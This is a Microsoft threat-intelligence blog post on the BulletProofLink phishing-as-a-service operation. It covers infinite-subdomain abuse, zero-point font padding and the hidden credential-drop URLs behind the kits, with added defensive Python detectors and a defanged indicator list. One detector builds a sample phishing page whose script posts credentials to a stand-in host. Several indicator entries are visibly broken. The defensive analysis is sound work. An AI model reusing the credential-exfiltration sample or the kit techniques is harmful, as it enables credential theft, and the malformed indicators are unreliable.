This is our commitment to you: the identity community will continue to collaborate closely in the coming years to help organizations everywhere stay ahead of these trends, which are daunting but exciting.

I recently shared my thoughts on these trends and ideas on practical steps our community can take to continue progress on this monumental undertaking at the 2021 European Identity and Cloud Conference. Please watch my session Identity’s evolving role in cloud security to learn more.

To learn more about Microsoft identity solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 3 trends shaping identity as the center of modern security appeared first on Microsoft Security Blog.

Catching the big fish: Analyzing a large-scale phishing-as-a-service operation

September 21st, 2021

In researching phishing attacks, we came across a campaign that used a rather high volume of newly created and unique subdomains—over 300,000 in a single run. This investigation led us down a rabbit hole as we unearthed one of the operations that enabled the campaign: a large-scale phishing-as-a-service operation called BulletProofLink, which sells phishing kits, email templates, hosting, and automated services at a relatively low cost.

With over 100 available phishing templates that mimic known brands and services, the BulletProofLink operation is responsible for many of the phishing campaigns that impact enterprises today. BulletProofLink (also referred to as BulletProftLink or Anthrax by its operators in various websites, ads, and other promotional materials) is used by multiple attacker groups in either one-off or monthly subscription-based business models, creating a steady revenue stream for its operators.

This comprehensive research into BulletProofLink sheds light on phishing-as-a-service operations. In this blog, we expose how effortless it can be for attackers to purchase phishing campaigns and deploy them at scale. We also demonstrate how phishing-as-a-service operations drive the proliferation of phishing techniques like “double theft”, a method in which stolen credentials are sent to both the phishing-as-a-service operator and their customers, resulting in monetization on several fronts.

Insights into phishing-as-a-service operations, their infrastructure, and their evolution inform protections against phishing campaigns. The knowledge we gained during this investigation ensures that Microsoft Defender for Office 365 protects customers from the campaigns that the BulletProofLink operation enables. As part of our commitment to improve protection for all, we are sharing these findings so the broader community can build on them and use them to enhance email filtering rules as well as threat detection technologies like sandboxes to better catch these threats.

Understanding phishing kits and phishing-as-a-service (PhaaS)

The persistent onslaught of email-based threats continues to pose a challenge for network defenders because of improvements in how phishing attacks are crafted and distributed. Modern phishing attacks are typically facilitated by a large economy of email and false sign-in templates, code, and other assets. While it was once necessary for attackers to individually build phishing emails and brand-impersonating websites, the phishing landscape has evolved its own service-based economy. Attackers who aim to facilitate phishing attacks may purchase resources and infrastructure from other attacker groups including:

  • Phish kits: Refers to kits that are sold on a one-time sale basis from phishing kit sellers and resellers. These are packaged files, usually a ZIP file, that come with ready-to-use email phishing templates designed to evade detection and are often accompanied by a portal with which to access them. Phish kits allow customers to set up the websites and purchase the domain names. Alternatives to phishing site templates or kits also include templates for the emails themselves, which customers can customize and configure for delivery. One example of a known phish kit is the MIRCBOOT phish kit.
  • Phishing-as-a-service: Similar to ransomware-as-a-service (RaaS), phishing-as-a-service follows the software-as-a-service model, in which attackers pay an operator to develop and deploy large portions of a phishing campaign, or the whole campaign, from false sign-in page development to website hosting and credential parsing and redistribution. BulletProofLink is an example of a phishing-as-a-service (PhaaS) operation.

Table showing differences between phishing kits and phishing-as-a-service

Figure 1. Feature comparison between phishing kits and phishing-as-a-service

It’s worth noting that some PhaaS groups may offer the whole deal—template creation, hosting, and overall orchestration—making it an enticing business model for their clientele. Many phishing service providers offer a hosted scam page solution they call “FUD” links or “fully undetected” links, a marketing term used by these operators to try to provide assurance that the links are viable until users click them. These phishing service providers host the links and pages, and attackers who pay for these services simply receive the stolen credentials later on. Unlike in certain ransomware operations, attackers do not gain access to devices directly and instead simply receive untested stolen credentials.

Breaking down BulletProofLink services

To understand how PhaaS works in detail, we dug deep into the templates, services, and pricing structure offered by the BulletProofLink operators. According to the group’s About Us web page, the BulletProofLink PhaaS group has been active since 2018 and proudly boasts of their unique services for every “dedicated spammer”.

Screenshot of About Us page on the BulletProofLink website

Figure 2. BulletProofLink’s ‘About Us’ page provides potential customers an overview of its services.

The operators maintain multiple sites under their aliases, BulletProftLink, BulletProofLink, and Anthrax, including YouTube and Vimeo pages with instructional advertisements as well as promotional materials on forums and other sites. In many of these cases, and in ICQ chat logs posted by the operator, customers refer to the group by these aliases interchangeably.

Screenshot of video tutorials posted by BulletProofLink

Figure 3. Video tutorials posted by the Anthrax Linkers (aka BulletProofLink)

BulletProofLink registration and sign-in pages

BulletProofLink additionally hosts multiple sites, including an online store where they allow their customers to register, sign in, and advertise their hosted service for monthly subscriptions.

Over the course of monitoring this operation, their online store had undergone multiple revisions. The source code for the site’s pages contained references to artifacts elsewhere on the site, which included ICQ chat messages and advertisements. While those references are still present in newer versions, the sign-in page for the monthly subscription site no longer contains service pricing information. In previous versions, the sites alluded to the cost for the operator to host FUD links and return credentials to the purchasing party.

Screenshot of BulletProofLink registration page

Figure 4. BulletProofLink registration page

Just like any other service, the group even boasts of a 10% welcome discount on customers’ orders when they subscribe to their newsletter.

Screenshot of 10% discount offered to those who will sign up for newsletter

Figure 5. BulletProofLink welcome promotion for site visitors’ first order

Credential phishing templates

BulletProofLink operators offer over 100 templates and operate with a highly flexible business model. Customers can buy the pages and “ship” the emails themselves, controlling the entire flow of password collection by registering their own landing pages, or they can make full use of the service by using BulletProofLink’s hosted links as the final site where potential victims key in their credentials.

The templates are designed to evade detection while successfully phishing for credentials, but may vary based on the individual purchasing party. Likewise, the wide variety of templates offered does not guarantee that all BulletProofLink facilitated campaigns will look identical. Instead, the campaigns themselves can be identified with a mixture of phishing page source code, combined with the PHP password processing sites referenced therein, as well as the hosting infrastructure used in their larger-scale campaigns. These password-processing domains correlate back to the operator through hosting, registration, email, and other metadata similarities during domain registration.

The templates offered are related to the phishing pages themselves, so the emails that service them may seem highly disparate and handled by multiple operators.

Services offered: Customer hosting and support

The phishing operators list an array of services on their site along with the corresponding fees. As OSINT Fans noted in their blog, the monthly service costs as much as $800, while other services cost about $50 for a one-time hosting link. We also found that Bitcoin is a common payment method accepted on the BulletProofLink site.

In addition to communicating with customers on site accounts, the operators display various methods of interacting with them, which include Skype, ICQ, forums, and chat rooms. Like a true software business dedicated to their customers, the operators provide customer support services for new and existing customers.

Screenshot of phishing templates being sold by BulletProofLink

Figure 6. Screenshot of the BulletProofLink site, which offers a wide array of phishing services impersonating various legitimate services

Screenshot of BulletProofLink website showing DocuSign services

Figure 7. DocuSign scam page service listed on the BulletProofLink site

The hosting service includes a weekly log shipment to purchasing parties, usually sent manually over ICQ or email. Analysis of individual activity on password-processing replies from the collected infrastructure indicates that the credentials are received on the initial template page and then sent to password-processing sites owned by the operator.

Screenshot of a BulletProofLink ad

Figure 8. An advertisement from BulletProofLink that showcases their weekly log shipment

At the time of this report, BulletProofLink continues to operate active phishing campaigns, with large volumes of redirections to their password-processing links from legitimate web hosting providers. In the next section, we describe one such campaign.

Tracking a BulletProofLink-enabled campaign

As mentioned, we uncovered BulletProofLink while investigating a phishing campaign that used the BulletProofLink phishing kit on either attacker-controlled sites or sites provided by BulletProofLink as part of their service. The campaign itself was notable for its use of 300,000 subdomains, but our analysis exposed one of many implementations of the BulletProofLink phishing kit:

Diagram showing BulletProofLink-enabled attack chain

Figure 9. End-to-end attack chain of BulletProofLink-enabled phishing campaigns

An interesting aspect of the campaign that drew our attention was its use of a technique we call “infinite subdomain abuse”, which happens when attackers compromise a website’s DNS or when a compromised site is configured with a DNS that allows wildcard subdomains. “Infinite subdomains” allow attackers to use a unique URL for each recipient while only having to purchase or compromise one domain for weeks on end. It is gaining popularity among attackers for the following reasons:

  • It serves as a departure from previous techniques that involved hackers obtaining large sets of single-use domains. To leverage infinite subdomains for use in email links that serve to redirect to a smaller set of final landing pages, the attackers then only need to compromise the DNS of the site, and not the site itself.
  • It allows phishing operators to maximize the unique domains they are able to use by configuring dynamically generated subdomains as prefix to the base domain for each individual email.
  • The creation of unique URLs poses a challenge to mitigation and detection methods that rely solely on exact matching for domains and URLs.

The phishing campaign also impersonated (albeit poorly) the Microsoft logo and branding. The impersonation technique used solid colors for the logo, which may have been done intentionally to bypass detection of the Microsoft logo’s four distinct colors. It is worth noting that later iterations of the campaign have switched to using the four colors in the Microsoft logo.

Screenshot of recent lure used in a BulletProofLink campaign

Figure 10. Phishing lure from a recent credential phishing campaign

These messages also used a technique called zero-point font, which pads the HTML of the message with characters that render as invisible to the user, to obfuscate the email body and evade detection. This technique is increasingly used by phishers.

Screenshot of email and HTML code showing zero-point font technique

Figure 11. HTML showing zero-point font date stuffing in an email
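The zero-point font padding described above can be picked apart with an ordinary HTML parser: walk the element tree, and any text under an element whose inline style sets the font size to zero is invisible to the recipient but visible to the filter. The following is an added example (not code from the original post or from Microsoft Defender for Office 365); SAMPLE_HTML and BENIGN_HTML are constructed messages, and the 0.2 hidden-character ratio used as the verdict threshold is an assumption chosen for the illustration.

```python
"""Detect zero-point font padding in an HTML email body.

Added example, not code from the original post or from Microsoft Defender.
SAMPLE_HTML is a constructed message; the only assumption about the technique
is the one the post states: filler text is made invisible by a font-size of
zero (via the style attribute), so it is absent from what the recipient reads
but present in the raw HTML that naive content matching sees.
"""
import re
from html.parser import HTMLParser

# Constructed sample: the visible sentence is split across hidden junk spans,
# and a whole hidden paragraph pads the body with unrelated filler.
SAMPLE_HTML = """<html><body>
<p>Your pass<span style="font-size:0px">kq9z</span>word expi<span style="font-size: 0">jjj</span>res today.</p>
<p><span style="FONT-SIZE:0pt">lorem ipsum dolor sit amet padding text</span>Sign in to keep access.</p>
<div style="font-size:0"><span>nested hidden</span> block</div>
</body></html>"""

BENIGN_HTML = "<html><body><p>Your invoice is attached.</p></body></html>"

# font-size of 0 / 0.0 in any common unit, as the last or a ;-terminated declaration
_ZERO_FONT_RE = re.compile(
    r"font-size\s*:\s*0(?:\.0+)?\s*(?:px|pt|em|rem|%)?\s*(?:;|$)", re.IGNORECASE
)
_VOID_TAGS = {"br", "img", "hr", "input", "meta", "link"}


def is_zero_font(style):
    """True when an inline style declares a zero font size."""
    return bool(style) and _ZERO_FONT_RE.search(style) is not None


class ZeroFontSplitter(HTMLParser):
    """Route text to 'visible' or 'hidden' depending on whether any open
    ancestor element carries a zero font-size declaration."""

    def __init__(self):
        super().__init__()
        self._hidden_stack = []  # one bool per open element
        self.visible = []
        self.hidden = []

    def handle_starttag(self, tag, attrs):
        if tag in _VOID_TAGS:
            return
        self._hidden_stack.append(is_zero_font(dict(attrs).get("style")))

    def handle_endtag(self, tag):
        if tag not in _VOID_TAGS and self._hidden_stack:
            self._hidden_stack.pop()

    def handle_data(self, data):
        (self.hidden if any(self._hidden_stack) else self.visible).append(data)


def _squash(parts):
    """Join fragments without separators (hidden spans may split a word in
    two) and collapse whitespace."""
    return re.sub(r"\s+", " ", "".join(parts)).strip()


def analyze(html, ratio_threshold=0.2):
    """Return the rendered text, the hidden padding, and a verdict: flagged
    when hidden characters exceed ratio_threshold of all non-space text."""
    parser = ZeroFontSplitter()
    parser.feed(html)
    parser.close()
    visible, hidden = _squash(parser.visible), _squash(parser.hidden)
    visible_chars = len(re.sub(r"\s", "", visible))
    hidden_chars = len(re.sub(r"\s", "", hidden))
    total = visible_chars + hidden_chars
    ratio = hidden_chars / total if total else 0.0
    return {
        "visible_text": visible,
        "hidden_text": hidden,
        "hidden_ratio": round(ratio, 3),
        "flagged": ratio > ratio_threshold,
    }


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(name, analyze(doc))
```

The rendered text is rebuilt by joining fragments with no separator, because the hidden spans are inserted mid-word; a filter that tokenizes the raw HTML instead of the rendered text is exactly what this padding is designed to defeat. A real filter would also treat display:none, visibility:hidden and text colored to match the background the same way.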

We found that the phishing URL in the email contained Base64-encoded victim information along with an attacker-owned site where the user is meant to be redirected. In this campaign, a single base domain was used for the infinite subdomain technique to initiate the redirects for the campaign, which leveraged multiple secondary sites over several weeks.

Screenshot of encoded URLs and the decoded URL

Figure 12. The format and an example of the phishing URL, which when decoded redirects to the compromised site.
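Two properties of this campaign, the one-subdomain-per-recipient lure links and the Base64-encoded victim data in the URL path, can both be handled by a small mail-log triage routine: group URLs by registrable domain to expose wildcard-DNS abuse that hostname exact-matching misses, and decode the trailing path segment to recover the recipient and the redirect target. This is an added example, not code from the original post or from Microsoft; it goes beyond the single campaign described by working on any batch of URLs. The sample URLs, the make_sample_url helper that builds them, the recipient|target layout of the Base64 payload, and the threshold of three hostnames are all constructed assumptions, since the post does not document the real payload format.

```python
"""Triage lure URLs that use wildcard ("infinite") subdomains and carry
Base64-encoded victim data in the path.

Added example; not code from the original post or from Microsoft. The sample
URLs, the 'recipient|target' Base64 layout and the hostnames are constructed
assumptions for this illustration.
"""
import base64
import binascii
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit


def make_sample_url(subdomain, base_domain, recipient, redirect_target):
    """Build a constructed lure URL of the assumed shape
    https://<random-sub>.<base>/r/<base64url("recipient|target")>."""
    payload = f"{recipient}|{redirect_target}".encode()
    token = base64.urlsafe_b64encode(payload).decode().rstrip("=")
    return f"https://{subdomain}.{base_domain}/r/{token}"


# Constructed sample: one wildcard base domain reused for many recipients,
# plus unrelated benign links, as a mail-log triage tool would see them.
SAMPLE_URLS = [
    make_sample_url("k3x9a2", "wild-example.test", "alice@victim.example", "https://landing-one.test/o365"),
    make_sample_url("q7m1zz", "wild-example.test", "bob@victim.example", "https://landing-one.test/o365"),
    make_sample_url("p0ff41", "wild-example.test", "carol@victim.example", "https://landing-two.test/owa"),
    make_sample_url("zz8b7c", "wild-example.test", "dave@victim.example", "https://landing-two.test/owa"),
    "https://www.benign.example/news/2021/09/article",
    "https://docs.benign.example/guide",
]


def registrable_domain(host):
    """Reduce a hostname to its registrable part by keeping the last two
    labels. Simplification: a production tool should consult the Public
    Suffix List so that hosts under e.g. co.uk are grouped correctly."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def subdomain_fanout(urls):
    """Map each registrable domain to the distinct hostnames seen under it."""
    fanout = defaultdict(set)
    for url in urls:
        host = urlsplit(url).hostname
        if host:
            fanout[registrable_domain(host)].add(host)
    return fanout


def flag_infinite_subdomains(urls, threshold=3):
    """Registrable domains whose distinct-hostname count reaches the threshold:
    the signature of wildcard DNS used for one-URL-per-recipient lures, which a
    hostname-level exact-match blocklist never catches twice."""
    return sorted(d for d, hosts in subdomain_fanout(urls).items() if len(hosts) >= threshold)


_B64_RE = re.compile(r"^[A-Za-z0-9_\-+/]+=*$")


def decode_victim_segment(url):
    """Try to decode the last path segment as Base64 'recipient|target'.
    Returns (recipient, target), or None when the segment is not such a token."""
    segment = unquote(urlsplit(url).path.rstrip("/").rsplit("/", 1)[-1])
    if not segment or not _B64_RE.match(segment):
        return None
    padded = segment + "=" * (-len(segment) % 4)  # tolerate stripped padding
    try:
        raw = base64.urlsafe_b64decode(padded.replace("+", "-").replace("/", "_"))
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if not text.isprintable() or "|" not in text:
        return None
    recipient, target = text.split("|", 1)
    return recipient, target


def triage(urls):
    """Summarise a batch: flagged wildcard domains, plus recipients grouped by
    the redirect target encoded in their lure."""
    targets = defaultdict(list)
    for url in urls:
        decoded = decode_victim_segment(url)
        if decoded:
            recipient, target = decoded
            targets[target].append(recipient)
    return {"wildcard_domains": flag_infinite_subdomains(urls), "redirect_targets": dict(targets)}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_URLS), indent=2))
```

Grouping by registrable domain is what makes the wildcard pattern visible: four lures, four hostnames, one domain. The decoded payloads then cluster recipients by the secondary site they were redirected to, which is how the several landing domains used over the weeks of this campaign could be tied back to one base domain.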

The compromised site redirected to a second domain that hosted the phishing page, which mimicked the Outlook sign-in screen and was generated for each user-specific URL. We found that the page was generated for any number of email addresses entered into the URI and had no checking mechanism to guarantee that it wasn’t already used or was related to a live phishing email.

There can be one or more locations to which credentials are sent, but the page employed a few obfuscation techniques to obscure these locations. One attempt to obfuscate the password processing site’s location was by using a function that decodes the location based on calling back to an array of numbers and letters:

Screenshot of a function that decodes the location based on calling back to an array of numbers and letters

We reversed this in Python and found the site that the credentials were being sent to: hxxps://webpicture[.]cc/email-list/finish-unv2[.]php. The pattern “email-list/finish-unv2.php” came in one of these variations: finish-unv2[.]php, finish-unv22[.]php, or finish[.]php. These variations typically used the term “email-list” as well as another file path segment referencing a particular phishing page template, such as OneDrive or SharePoint.

Occasionally, multiple locations were used to send credentials to, including some that could be owned by the purchasing party instead of the operator themselves, which could be called in a separate function. This could be an example of legacy artifacts remaining in final templates, or of double-theft occurring.

Screenshot showing patterns of final site URL

Figure 13. The final site’s format comes in either of these pattern variations
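Reversing the index-into-an-array trick above and then listing every location the page posts credentials to is a routine analysis step, and it is also how the double-theft artifact (a second, purchaser-owned drop next to the operator's) shows up. The following is an added example, not code from the original post or from Microsoft. The page fragment it analyzes is constructed: a character array plus an index array that rebuild the drop URL at runtime, in the shape the post describes, alongside a plainly visible form action. The hostnames are placeholders; only the email-list/finish*.php path variants come from the post.

```python
"""Recover the password-processing endpoints from a phishing page template.

Added example, not code from the original post or from Microsoft. The page
fragment is constructed; the hostnames are placeholders. Only the
'email-list/finish*.php' path pattern comes from the post.
"""
import re
from urllib.parse import urlsplit


def build_sample_page():
    """Construct the sample template. The arrays are generated here only so the
    example is self-contained; the decoder below never sees the literal URL."""
    primary = "https://operator-processing.test/email-list/finish-unv2.php"
    alphabet = sorted(set(primary))
    indices = [alphabet.index(c) for c in primary]
    js_alphabet = ",".join(f'"{c}"' for c in alphabet)
    js_indices = ",".join(str(i) for i in indices)
    return (
        '<form id="login" action="https://buyer-drop.test/email-list/finish.php" method="post">\n'
        '<input name="email"><input name="password" type="password"></form>\n'
        "<script>\n"
        f"var _k = [{js_alphabet}];\n"
        f"var _p = [{js_indices}];\n"
        'function _loc(){var s="";for(var i=0;i<_p.length;i++){s+=_k[_p[i]];}return s;}\n'
        'document.getElementById("login").addEventListener("submit",'
        'function(){fetch(_loc(),{method:"POST"});});\n'
        "</script>\n"
    )


_ARRAY_RE = re.compile(r"var\s+(\w+)\s*=\s*\[([^\]]*)\]\s*;")
_PLAIN_URL_RE = re.compile(
    r"""(?:action|href|src)\s*=\s*["'](https?://[^"']+)["']|"""
    r"""(?:fetch|open)\(\s*["'](https?://[^"']+)["']"""
)
# Path variants the post lists for BulletProofLink password-processing sites
KNOWN_PATH_RE = re.compile(r"/email-list/finish(?:-unv22?)?\.php$")


def extract_arrays(page):
    """Pull JavaScript array literals that are either all single-character
    strings (an alphabet) or all integers (an index list)."""
    arrays = {}
    for name, body in _ARRAY_RE.findall(page):
        items = [s.strip() for s in body.split(",") if s.strip()]
        if items and all(re.fullmatch(r'"[^"]"', s) for s in items):
            arrays[name] = [s[1:-1] for s in items]
        elif items and all(re.fullmatch(r"\d+", s) for s in items):
            arrays[name] = [int(s) for s in items]
    return arrays


def decode_indexed_string(alphabet, indices):
    """Rebuild the string the page's lookup loop would produce; None if an
    index falls outside the alphabet (wrong pairing of arrays)."""
    if any(i < 0 or i >= len(alphabet) for i in indices):
        return None
    return "".join(alphabet[i] for i in indices)


def recover_obfuscated_urls(page):
    """Try every (alphabet, index list) pairing and keep results that are URLs."""
    arrays = extract_arrays(page)
    alphabets = [v for v in arrays.values() if v and isinstance(v[0], str)]
    index_lists = [v for v in arrays.values() if v and isinstance(v[0], int)]
    found = set()
    for alpha in alphabets:
        for idx in index_lists:
            s = decode_indexed_string(alpha, idx)
            if s and s.startswith(("http://", "https://")):
                found.add(s)
    return found


def find_exfil_targets(page):
    """All credential drop locations: literal URLs plus decoded obfuscated ones."""
    plain = {a or b for a, b in _PLAIN_URL_RE.findall(page)}
    return sorted(plain | recover_obfuscated_urls(page))


def matches_known_pattern(url):
    """True when the path matches one of the finish*.php variants from the post."""
    return KNOWN_PATH_RE.search(urlsplit(url).path) is not None


def double_theft_suspected(targets):
    """Credentials posted to more than one host: the purchaser's drop and the
    operator's own processing site may both receive them."""
    return len({urlsplit(u).hostname for u in targets}) > 1


if __name__ == "__main__":
    page = build_sample_page()
    targets = find_exfil_targets(page)
    for t in targets:
        print(t, "known-pattern" if matches_known_pattern(t) else "other")
    print("double theft suspected:", double_theft_suspected(targets))
```

Pairing every character array with every index array, rather than guessing which variable feeds the lookup loop, keeps the decoder robust to renamed variables; the range check rejects mismatched pairs cheaply. Two distinct drop hosts in one template is the signal worth recording alongside the page's own fingerprint, since it is the purchaser's location, not the operator's, that will vary between campaigns built from the same kit.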

Analyzing these patterns led us to an extensive list of password-capturing URIs detailed in an OSINT Fans blog post about the BulletProofLink phishing service operators. We noticed that they listed patterns similar to the ones we had just observed, enabling us to find the various templates BulletProofLink used, including the phishing email with the fake Microsoft logo discussed earlier.

One of the patterns we noted is that many of the password-processing domains used in the campaigns directly had associated email addresses with “Anthrax”, “BulletProofLink”, “BulletProftLink” or other terms in the certificate registration. The email addresses themselves were not listed identically on every certificate, and were also tied to domains not used exclusively for password-processing, as noted in additional reporting by OSINT Fans.

From then on, we drew even more similarities between the landing pages seen in the infinite subdomain surge campaign we were tracking and the existing in-depth research on the adversaries behind the BulletProofLink operations.

This process ultimately led us to track and expand on the same resources referenced in the OSINT Fans research, as we uncovered even more information about the long-running and large-scale phishing service BulletProofLink. Furthermore, we were able to uncover previous and current password-processing sites in use by the operator, as well as large segments of infrastructure hosted on legitimate hosting sites for this operation’s other components.

“Double theft” as a PhaaS monetization effort

The PhaaS working model as we’ve described it thus far is reminiscent of the ransomware-as-a-service (RaaS) model, which involves double extortion. The extortion method used in ransomware generally involves attackers exfiltrating data and posting it publicly, in addition to encrypting it on compromised devices, to put pressure on organizations to pay the ransom. This gives attackers multiple ways to assure payment, while the released data can then be weaponized in future attacks by other operators. In a RaaS scenario, the ransomware operator has no obligation to delete the stolen data even if the ransom is already paid.

We have observed this same workflow in the economy of stolen credentials in phishing-as-a-service. With phishing kits, it is trivial for operators to include a secondary location for credentials to be sent to and hope that the purchaser of the phish kit does not alter the code to remove it. This is true for the BulletProofLink phishing kit, and in cases where the attackers using the service received credentials and logs at the end of a week instead of conducting campaigns themselves, the PhaaS operator maintained control of all credentials they resell.

In both ransomware and phishing, the operators supplying resources to facilitate attacks maximize monetization by ensuring that stolen data, access, and credentials are put to use in as many ways as possible. Additionally, victims’ credentials are also likely to end up in the underground economy.

For a relatively simple service, the return on investment offers considerable motivation as far as the email threat landscape goes.

How Microsoft Defender for Office 365 defends against PhaaS-driven phishing attacks

Investigating specific email campaigns allows us to ensure protections against particular attacks as well as similar attacks that use the same techniques, such as the infinite subdomain abuse, brand impersonation, zero-point font obfuscation, and victim-specific URI used in the campaign discussed in this blog. By studying phishing-as-a-service operations, we are able to scale and expand the coverage of these protections to multiple campaigns that use the services of these operations.

In the case of BulletProofLink, our intelligence on the unique phishing kits, phishing services, and other components of phishing attacks allows us to ensure protection against the many phishing campaigns this operation enables. Microsoft Defender for Office 365—which uses machine learning, heuristics, and an advanced detonation technology to analyze emails, attachments, URLs, and landing pages in real time—recognizes the BulletProofLink phishing kit that serves the false sign-in pages and detects the associated emails and URLs.

In addition, based on our research into BulletProofLink and other PhaaS operations, we observed that numerous phishing kits leverage the code and behaviors of existing kits, such as those sold by BulletProofLink. Any kit that attempts to leverage similar techniques, or stitch together code from multiple kits can similarly be detected and remediated before the user receives the email or engages with the content.

With Microsoft 365 Defender, we’re able to further expand that protection, for example, by blocking phishing websites and other malicious URLs and domains in the browser through Microsoft Defender SmartScreen, as well as by detecting suspicious and malicious behavior on endpoints. Advanced hunting capabilities allow customers to search through key metadata fields on mail flow for the indicators listed in this blog and other anomalies. Email threat data is correlated with signals from endpoints and other domains, providing even richer intelligence and expanding investigation capabilities.
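As an added example that is not part of the original post, the following Python script does offline what the hunting step above describes: it refangs a handful of the password-processing indicators listed at the end of this post, checks the URL host of constructed mail-flow records against them (exact domain or any subdomain, so the campaign’s throwaway subdomains still hit, while look-alike hosts that merely contain the indicator do not), and strips zero-point font text from an HTML body so brand keywords split that way are visible to downstream rules. The record layout, the sample messages, and the HTML fragment are constructed for the example.

```python
"""Offline matching of mail-flow URL metadata against defanged indicators.

Added example, not code from the Microsoft post. It refangs a subset of the
password-processing indicators listed in the post, checks the URL host of
constructed mail-flow records against them, and strips zero-point font text
from an HTML body so hidden brand keywords surface for later rules.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# A subset of the password-processing indicators from the post, defanged
# exactly as published.
DEFANGED_INDICATORS = [
    "hxxps://apidatacss[.]com/finish-unv22[.]php",
    "hxxps://ses-smtp[.]com/email-list/office19999999/finish[.]php",
    "hxxps://ghostsmtp[.]com:443/email-list/onedrive23/finish[.]php",
    "hxxps://prvtsmtp[.]com/email-list/onedrive23/finish[.]php?i-am-a-phishing-processor",
    "hxxps://gpxsmtp[.]com",
]


def refang(indicator: str) -> str:
    """Turn 'hxxps://host[.]tld' back into a parseable URL string."""
    s = re.sub(r"^hxxp", "http", indicator.strip(), flags=re.IGNORECASE)
    return s.replace("[.]", ".")


def indicator_domain(indicator: str) -> str:
    """Lower-cased hostname of a defanged indicator, with any port dropped."""
    return (urlsplit(refang(indicator)).hostname or "").lower()


def match_indicators(events, indicators=DEFANGED_INDICATORS):
    """Return (message id, matched domain) for every event whose URL host
    equals an indicator domain or is a subdomain of one. The comparison is
    anchored on the label boundary, so ses-smtp.com.evil.example is not a hit."""
    bad = {indicator_domain(i) for i in indicators} - {""}
    hits = []
    for ev in events:
        host = (urlsplit(ev["url"]).hostname or "").lower()
        for d in sorted(bad):
            if host == d or host.endswith("." + d):
                hits.append((ev["msg"], d))
                break
    return hits


# Void elements never get a closing tag, so they must not touch the stack.
_VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
         "link", "meta", "param", "source", "track", "wbr"}
_ZERO_FONT = re.compile(r"font-size\s*:\s*0(?:\.0+)?\s*(?:px|pt|em|%)?\s*(?:;|$)", re.I)


class VisibleTextExtractor(HTMLParser):
    """Collects text while skipping elements styled with a zero font size
    (the zero-point font obfuscation used to break up brand names)."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._hidden = []  # one bool per open non-void element

    def handle_starttag(self, tag, attrs):
        if tag in _VOID:
            return
        style = dict(attrs).get("style") or ""
        self._hidden.append(bool(_ZERO_FONT.search(style)))

    def handle_endtag(self, tag):
        if tag not in _VOID and self._hidden:
            self._hidden.pop()

    def handle_data(self, data):
        if not any(self._hidden):
            self.parts.append(data)


def visible_text(html: str) -> str:
    """Text a recipient actually sees, whitespace-normalised."""
    p = VisibleTextExtractor()
    p.feed(html)
    p.close()
    return re.sub(r"\s+", " ", "".join(p.parts)).strip()


# Constructed mail-flow records (not real telemetry): message id, sender,
# and one URL extracted from the body.
SAMPLE_MAIL_URL_EVENTS = [
    {"msg": "m1", "from": "hr@corp.example", "url": "https://apidatacss.com/finish-unv22.php"},
    {"msg": "m2", "from": "news@corp.example", "url": "https://www.microsoft.com/"},
    {"msg": "m3", "from": "it@corp.example", "url": "HTTPS://GPXSMTP.COM:443/email-list/office1/finish.php"},
    {"msg": "m4", "from": "a@corp.example", "url": "https://ses-smtp.com.evil.example/login"},
    {"msg": "m5", "from": "b@corp.example", "url": "https://login.ses-smtp.com/email-list/x/finish.php"},
]

# Constructed body fragment using zero-point font spans to split a brand name.
SAMPLE_HTML = ('<p>Your <span style="FONT-SIZE: 0px">zq</span>Micro'
               '<span style="font-size:0">xx</span>soft password expires today.</p>')

if __name__ == "__main__":
    for msg, domain in match_indicators(SAMPLE_MAIL_URL_EVENTS):
        print(f"{msg}: URL host matches indicator domain {domain}")
    print(visible_text(SAMPLE_HTML))
```

Matching on the hostname rather than the full URL is deliberate: the same operator reused domains with many different `email-list/<brand>/finish.php` paths, so a path-exact match would miss most of them, while the domain list in the indicators section catches the lot.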

To build resilience against phishing attacks in general, organizations can use anti-phishing policies to enable mailbox intelligence settings, as well as configure impersonation protection settings for specific messages and sender domains. Enabling Safe Links ensures real-time protection by scanning at time of delivery and at time of click.

In addition to taking full advantage of the tools available in Microsoft Defender for Office 365, administrators can further strengthen defenses against the threat of phishing by securing the Azure AD identity infrastructure. We strongly recommend enabling multifactor authentication and blocking sign-in attempts from legacy authentication.

Learn how you can stop credential phishing and other email threats through comprehensive, industry-leading protection with Microsoft Defender for Office 365.


Microsoft 365 Defender Threat Intelligence Team


Indicators of compromise

Password-processing URLs:

  • hxxps://apidatacss[.]com/finish-unv22[.]php
  • hxxps://ses-smtp[.]com/email-list/office19999999/finish[.]php
  • hxxps:// ses-smtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps:// ses-smtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://smtpro101[.]com/email-list/onedrive25/finish[.]php
  • hxxps://smtpro101[.]com/email-list/office19999999/finish[.]php
  • hxxps://plutosmto[.]com/email-list/office365nw/finish[.]php
  • hxxps://smtptemp[.].site/email-list/office365nw/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/finish-unv2[.]php
  • hxxps://smtptemp[.]site/email-list/office365nw/finish-unv22[.]php
  • hxxps://apidatacss:com/finish-unv22[.]php
  • hxxps://[.]php
  • hxxps://[.]php
  • hxxps://plutosmto[.]com/email-list/kumar/finish[.]php
  • hxxps://[.]php
  • hxxps://jupitersmt[.]com/email-list/office365nw/finish[.]php
  • hxxps://plutosmto[.]com/email-list/onedrive25/finish[.]php
  • hxxps://plutosmto[.]com/email-list/sharepointbuisness/finish[.]php
  • hxxps://ghostsmtp[.]com/email-list/sharepoint/finish[.]php
  • hxxps://jupitersmt[.]com/email-list/otlk/finish[.]php
  • hxxps://earthsmtp[.]com/email-list/onedrive25/finish[.]php
  • hxxps://earthsmtp[.]com/email-list/office365nw/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/defaultcustomers/johnphilips002021/finish[.]php
  • hxxps://trasactionsmtp[.]com/email-list/office365nw/finish[.]php
